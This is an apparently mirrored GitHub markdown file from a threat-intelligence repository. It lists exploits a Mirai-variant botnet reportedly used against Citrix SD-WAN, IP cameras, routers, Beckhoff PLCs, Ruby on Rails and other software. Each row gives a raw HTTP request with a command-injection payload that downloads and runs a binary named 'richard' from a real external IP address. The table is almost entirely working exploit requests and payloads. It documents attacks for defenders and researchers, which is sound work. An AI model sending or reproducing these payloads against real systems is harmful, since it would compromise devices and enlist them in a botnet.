admin/APT_REPORT
1
0
Fork 0
mirror of https://github.com/blackorbird/APT_REPORT.git synced 2025-06-20 18:00:13 +00:00
Code Issues Packages Projects Releases Wiki Activity
APT_REPORT/Exploit/EXP-LIST.md

24 lines
7.2 KiB
Markdown
Raw Normal View History

Update and rename Readme.md to EXP-LIST.md
2019-12-18 14:53:20 +08:00
For more details please contact * [@blackorbrid](https://twitter.com/blackorbird)
Update EXP-LIST.md
2019-12-18 17:45:35 +08:00
Thanks for * [pan-unit42](https://github.com/pan-unit42)
|*Vulnerability* | *Affected Devices* | *Exploit Format*|
|---|---|---|
|[CVE-2019-12989, CVE-2019-12991](https://www.exploit-db.com/exploits/47112)|Citrix SD-WAN Appliances (tested on 10.2.2)|```POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % '99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```<br>```'SSL_CLIENT_VERIFY' : 'SUCCESS'```<br>```get_package_fil:```<br>```site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active```<br><br>```User-Agent: Hello-World```<br>```Connection: keep-alive```|
|[EyeLock nano NXT Remote Code Execution](https://www.exploit-db.com/exploits/40228)| EyeLock NXT Biometric Iris Readers with firmware version 3.5|```GET /scripts/rpc.php?action=updatetime&timeserver=\|\|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```|
|[Iris ID IrisAccess ICU Cross-Site Scripting](https://www.exploit-db.com/exploits/40166)|Iris ID IrisAccess ICU 7000-2|```POST /html/SetSmarcardSettings.php HTTP/1.1```<br>```Content-Length: 11660```<br>```Content-Type: application/x-www-form-urlencoded```<br>```Connection: close```<br>```X-Powered-By: PHP/5.5.13```<br>```User-Agent: joxypoxy/7.2.6```<br><br>```HidChannelID=2&HidcmbBook=0&cmbBook=0\|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08```|
|[CVE-2015-4051](https://www.exploit-db.com/exploits/38514)|Beckhoff CX9020 PLCs|```POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1```<br>```User-Agent: Hello-World```<br>```Host: 192.168.0.1:5120```<br>```Content-type: text/xml; charset=utf-8```<br>```SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write```<br>```M-SEARCH * HTTP/1.1```<br>```HOST: 239.255.255.250:1900```<br>```MAN: ssdp:discover',0Dh,0Ah```<br>```MX: 3```<br>```ST: upnp:rootdevice```<br><br>```<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>```|
|[Xfinity Gateway Remote Code Execution](https://www.exploit-db.com/exploits/40856)|Xfinity Gateways|```POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1```<br>```Host: 10.0.0.1:80```<br>```User-Agent: ```<br>```Accept: application/json, text/javascript, */*; q=0.01```<br>```Accept-Language: en-US,en;q=0.5```<br>```Accept-Encoding: gzip, deflate```<br>```Content-Type: application/x-www-form-urlencoded; charset=UTF-8```<br>```X-Requested-With: XMLHttpRequest```<br>```Referer: http://10.0.0.1/network_diagnostic_tools.php```<br>```Content-Length: 91```<br>```Cookie: PHPSESSID=; auth=```<br>```DNT: 1```<br>```X-Forwarded-For: 8.8.8.8```<br>```Connection: keep-alive```<br><br>```test_connectivity=true&destination_address=www.comcast.net \|\| cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4```|
|[Beward N100 Authenticated Remote Code Execution](https://www.exploit-db.com/exploits/46319)|Beward N100 IP Cameras|```GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.2.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```<br>```Authorization: Basic YWRtaW46YWRtaW4=```<br>```Server: Boa/0.94.14rc21```<br>```Accept-Ranges: bytes```<br>```Connection: close```<br>```Content-type: text/plain```|
|[Fritz!Box Webcm Command Injection](https://www.exploit-db.com/exploits/32753) - this vulnerability was first briefly seen exploited by the Muhstik botnet in January 2018. This is the first instance of exploitation by a Mirai descendant.|Several versions of Fritz!Box devices|```GET /cgi-bin/webcm HTTP/1.1```<br><br>```var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard```|
|[FLIR Thermal Camera Command Injection](https://www.exploit-db.com/exploits/42788)| Certain FC-Series S and PT-Series models of FLIR Cameras|```POST /page/maintenance/lanSettings/dns HTTP/1.1```<br>```Host: 192.168.0.1:80```<br>```Content-Length: 64```<br>```Accept: */*```<br>```Origin: http://192.168.0.1```<br>```X-Requested-With: XMLHttpRequest```<br>```User-Agent: Testingus/1.0```<br>```Content-Type: application/x-www-form-urlencoded```<br>```Referer: http://192.168.0.1/maintenance```<br>```Accept-Language: en-US,en;q=0.8,mk;q=0.6```<br>```Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b```<br>```Connection: close```<br><br>```dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60```|
|[Sapido RB-1732 Remote Command Execution](https://www.exploit-db.com/exploits/47031)|Sapido RB-1732 Wireless Routers | ```GET /goform/formSysCmd HTTP/1.1```<br>```('<textarea rows="15" name="msg" cols="80" wrap="virtual">')```<br>```('</textarea>')```<br><br>```{'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}```|
|[CVE-2016-0752](https://www.exploit-db.com/exploits/40561)|Ruby on Rails multiple versions|```POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1```<br>```Content-Type: multipart/form-data; boundary=```<br>```<%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>```|
|[CVE-2014-3914](https://www.exploit-db.com/exploits/33807)|Rocket ServerGraph 1.2 (tested on Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu 12.04 64 bits)|```POST /SGPAdmin/fileRequest HTTP/1.1```<br>```&invoker=&title=&params=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=```|
|[CVE-2015-2208](https://www.exploit-db.com/exploits/36251)|PHPMoAdmin installations|```POST /moadmin/moadmin.php HTTP/1.1```<br>```Host: 192.168.0.1:80```<br>```User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0```<br>```Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8```<br>```Accept-Language: en-US,en;q=0.5```<br>```Accept-Encoding: gzip, deflate```<br>```DNT: 1```<br>```Connection: keep-alive```<br>```Pragma: no-cache```<br>```Cache-Control: no-cache```<br>```Content-Type: application/x-www-form-urlencoded```<br>```Content-Length: 34```<br><br>```object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit```|
Reference in New Issue Copy Permalink